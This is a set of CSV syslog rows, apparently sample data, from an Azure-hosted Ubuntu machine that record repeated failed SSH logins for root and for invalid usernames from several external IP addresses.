+11346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:29,UbuntuDevEnv,2019-06-26 00:22:29,auth,UbuntuDevEnv,info,Failed password for invalid user nicholas from 186.31.116.78 port 56301 ssh2,71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,186.31.116.7,56301,,
+11347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:30,UbuntuDevEnv,2019-06-26 00:22:29,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 56301:11: Bye Bye [preauth],71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,56301,,
+11348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:30,UbuntuDevEnv,2019-06-26 00:22:29,auth,UbuntuDevEnv,info,Disconnected from invalid user nicholas 186.31.116.78 port 56301 [preauth],71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,186.31.116.7,56301,,
+11349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:30,UbuntuDevEnv,2019-06-26 00:22:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186  user=root,71786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,118.222.146.1,,0,
+11350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:32,UbuntuDevEnv,2019-06-26 00:22:32,auth,UbuntuDevEnv,info,Failed password for root from 118.222.146.186 port 55430 ssh2,71786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,55430,,
+11351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:32,UbuntuDevEnv,2019-06-26 00:22:32,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 118.222.146.186 port 55430 [preauth],71786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,118.222.146.1,55430,,
+11352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:32,UbuntuDevEnv,2019-06-26 00:22:32,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 55430:11: Bye Bye [preauth],71786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,55430,,
+11353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:57,UbuntuDevEnv,2019-06-26 00:22:57,auth,UbuntuDevEnv,info,Invalid user ts3 from 104.248.121.67 port 49565,71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,104.248.121.6,49565,,
+11354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:57,UbuntuDevEnv,2019-06-26 00:22:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:57,UbuntuDevEnv,2019-06-26 00:22:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:00,UbuntuDevEnv,2019-06-26 00:22:59,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 104.248.121.67 port 49565 ssh2,71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,104.248.121.6,49565,,
+11357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:00,UbuntuDevEnv,2019-06-26 00:22:59,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 104.248.121.67 port 49565 [preauth],71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,104.248.121.6,49565,,
+11358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:00,UbuntuDevEnv,2019-06-26 00:22:59,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 49565:11: Bye Bye [preauth],71880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,49565,,
+11359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:46,UbuntuDevEnv,2019-06-26 00:23:45,auth,UbuntuDevEnv,info,Invalid user jin from 88.247.110.88 port 53997,72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jin,88.247.110.8,53997,,
+11360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:46,UbuntuDevEnv,2019-06-26 00:23:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:46,UbuntuDevEnv,2019-06-26 00:23:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:48,UbuntuDevEnv,2019-06-26 00:23:47,auth,UbuntuDevEnv,info,Failed password for invalid user jin from 88.247.110.88 port 53997 ssh2,72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jin,88.247.110.8,53997,,
+11363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:48,UbuntuDevEnv,2019-06-26 00:23:48,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 53997:11: Bye Bye [preauth],72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,53997,,
+11364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:48,UbuntuDevEnv,2019-06-26 00:23:48,auth,UbuntuDevEnv,info,Disconnected from invalid user jin 88.247.110.88 port 53997 [preauth],72054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jin,88.247.110.8,53997,,
+11365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:23:59,UbuntuDevEnv,2019-06-26 00:23:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180  user=root,72095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,114.112.81.1,,0,
+11366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:00,UbuntuDevEnv,2019-06-26 00:24:00,auth,UbuntuDevEnv,info,Failed password for root from 114.112.81.180 port 33836 ssh2,72095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,33836,,
+11367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:01,UbuntuDevEnv,2019-06-26 00:24:00,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 33836:11: Bye Bye [preauth],72095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,33836,,
+11368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:01,UbuntuDevEnv,2019-06-26 00:24:00,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 114.112.81.180 port 33836 [preauth],72095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,114.112.81.1,33836,,
+11369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:14,UbuntuDevEnv,2019-06-26 00:24:13,auth,UbuntuDevEnv,info,Invalid user postmaster from 118.222.146.186 port 43960,72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,118.222.146.1,43960,,
+11370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:14,UbuntuDevEnv,2019-06-26 00:24:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:14,UbuntuDevEnv,2019-06-26 00:24:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:16,UbuntuDevEnv,2019-06-26 00:24:15,auth,UbuntuDevEnv,info,Failed password for invalid user postmaster from 118.222.146.186 port 43960 ssh2,72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,118.222.146.1,43960,,
+11373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:16,UbuntuDevEnv,2019-06-26 00:24:16,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 43960:11: Bye Bye [preauth],72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,43960,,
+11374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:16,UbuntuDevEnv,2019-06-26 00:24:16,auth,UbuntuDevEnv,info,Disconnected from invalid user postmaster 118.222.146.186 port 43960 [preauth],72150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,118.222.146.1,43960,,
+11375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:24,UbuntuDevEnv,2019-06-26 00:24:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3  user=root,72176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,131.100.219.3,,0,
+11376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:24,UbuntuDevEnv,2019-06-26 00:24:23,auth,UbuntuDevEnv,info,Invalid user nicholas from 104.248.121.67 port 58003,72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,104.248.121.6,58003,,
+11377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:24,UbuntuDevEnv,2019-06-26 00:24:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:24,UbuntuDevEnv,2019-06-26 00:24:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Failed password for root from 131.100.219.3 port 49530 ssh2,72176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,49530,,
+11380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Failed password for invalid user nicholas from 104.248.121.67 port 58003 ssh2,72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,104.248.121.6,58003,,
+11381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 58003:11: Bye Bye [preauth],72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,58003,,
+11382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Disconnected from invalid user nicholas 104.248.121.67 port 58003 [preauth],72194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,104.248.121.6,58003,,
+11383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 131.100.219.3 port 49530 [preauth],72176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,131.100.219.3,49530,,
+11384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 49530:11: Bye Bye [preauth],72176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,49530,,
+11385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,auth,UbuntuDevEnv,info,Invalid user tester from 186.31.116.78 port 36865,72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,186.31.116.7,36865,,
+11386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:25,UbuntuDevEnv,2019-06-26 00:24:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:27,UbuntuDevEnv,2019-06-26 00:24:27,auth,UbuntuDevEnv,info,Failed password for invalid user tester from 186.31.116.78 port 36865 ssh2,72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,186.31.116.7,36865,,
+11389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:27,UbuntuDevEnv,2019-06-26 00:24:27,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 36865:11: Bye Bye [preauth],72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,36865,,
+11390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:24:27,UbuntuDevEnv,2019-06-26 00:24:27,auth,UbuntuDevEnv,info,Disconnected from invalid user tester 186.31.116.78 port 36865 [preauth],72196,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,186.31.116.7,36865,,
+11391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:23,UbuntuDevEnv,2019-06-26 00:25:22,auth,UbuntuDevEnv,info,Invalid user aruna from 88.247.110.88 port 59971,72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aruna,88.247.110.8,59971,,
+11392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:23,UbuntuDevEnv,2019-06-26 00:25:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:23,UbuntuDevEnv,2019-06-26 00:25:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:24,UbuntuDevEnv,2019-06-26 00:25:24,auth,UbuntuDevEnv,info,Failed password for invalid user aruna from 88.247.110.88 port 59971 ssh2,72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aruna,88.247.110.8,59971,,
+11395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:24,UbuntuDevEnv,2019-06-26 00:25:24,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 59971:11: Bye Bye [preauth],72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,59971,,
+11396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:24,UbuntuDevEnv,2019-06-26 00:25:24,auth,UbuntuDevEnv,info,Disconnected from invalid user aruna 88.247.110.88 port 59971 [preauth],72402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aruna,88.247.110.8,59971,,
+11397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:44,UbuntuDevEnv,2019-06-26 00:25:43,auth,UbuntuDevEnv,info,Invalid user appuser from 114.112.81.180 port 52850,72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,114.112.81.1,52850,,
+11398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:44,UbuntuDevEnv,2019-06-26 00:25:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:44,UbuntuDevEnv,2019-06-26 00:25:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:46,UbuntuDevEnv,2019-06-26 00:25:45,auth,UbuntuDevEnv,info,Failed password for invalid user appuser from 114.112.81.180 port 52850 ssh2,72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,114.112.81.1,52850,,
+11401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:46,UbuntuDevEnv,2019-06-26 00:25:46,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 52850:11: Bye Bye [preauth],72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,52850,,
+11402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:46,UbuntuDevEnv,2019-06-26 00:25:46,auth,UbuntuDevEnv,info,Disconnected from invalid user appuser 114.112.81.180 port 52850 [preauth],72471,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,114.112.81.1,52850,,
+11403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:47,UbuntuDevEnv,2019-06-26 00:25:47,auth,UbuntuDevEnv,info,Invalid user nagios from 104.248.121.67 port 38208,72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,104.248.121.6,38208,,
+11404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:47,UbuntuDevEnv,2019-06-26 00:25:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:47,UbuntuDevEnv,2019-06-26 00:25:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
